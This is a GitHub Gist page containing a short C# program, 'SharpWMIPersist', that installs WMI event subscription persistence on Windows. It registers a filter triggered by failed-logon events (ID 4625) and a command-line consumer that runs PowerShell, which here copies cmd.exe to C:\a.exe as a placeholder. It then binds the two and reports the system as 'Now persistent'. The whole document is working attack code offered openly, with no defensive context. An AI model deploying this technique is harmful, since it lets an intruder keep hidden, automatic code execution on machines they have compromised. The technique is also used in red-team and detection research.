-
-
Save MsF-NTDLL/94eef014e4d67a1ba6545a5454994351 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Management; | |
| namespace SharpWMIPersist | |
| { | |
| class Program | |
| { | |
| public static void Main() | |
| { | |
| ManagementObject EventFilter = null; | |
| ManagementObject EventConsumer = null; | |
| ManagementObject Binding = null; | |
| ManagementScope scope = new ManagementScope("\\\\.\\root\\subscription"); | |
| //EventFilter Creation | |
| ManagementClass wmiEventFilter = new ManagementClass(scope, new ManagementPath("__EventFilter"), null); | |
| WqlEventQuery wqlFilterQuery = new WqlEventQuery("SELECT * FROM __InstanceCreationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_NTLogEvent' AND Targetinstance.EventCode = '4625'"); | |
| EventFilter = wmiEventFilter.CreateInstance(); | |
| EventFilter["Name"] = "WMITestFilter"; | |
| EventFilter["Query"] = wqlFilterQuery.QueryString; | |
| EventFilter["QueryLanguage"] = wqlFilterQuery.QueryLanguage; | |
| EventFilter["EventNameSpace"] = @"\root\cimv2"; | |
| EventFilter.Put(); | |
| Console.WriteLine("Filter created"); | |
| //EventConsumer Creation | |
| ManagementClass wmiEventConsumer = new ManagementClass(scope, new ManagementPath("CommandLineEventConsumer"), null); | |
| EventConsumer = wmiEventConsumer.CreateInstance(); | |
| EventConsumer["Name"] = "WMITestConsumer"; | |
| EventConsumer["CommandLineTemplate"] = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe copy C:\\Windows\\System32\\cmd.exe C:\\a.exe"; | |
| EventConsumer.Put(); | |
| Console.WriteLine("Consumer created"); | |
| //Binding Creation | |
| ManagementClass wmiBinding = new ManagementClass(scope, new ManagementPath("__FilterToConsumerBinding"), null); | |
| Binding = wmiBinding.CreateInstance(); | |
| Binding["Filter"] = EventFilter.Path.RelativePath; | |
| Binding["Consumer"] = EventConsumer.Path.RelativePath; | |
| Binding.Put(); | |
| Console.WriteLine("Binding created, Now persistent"); | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment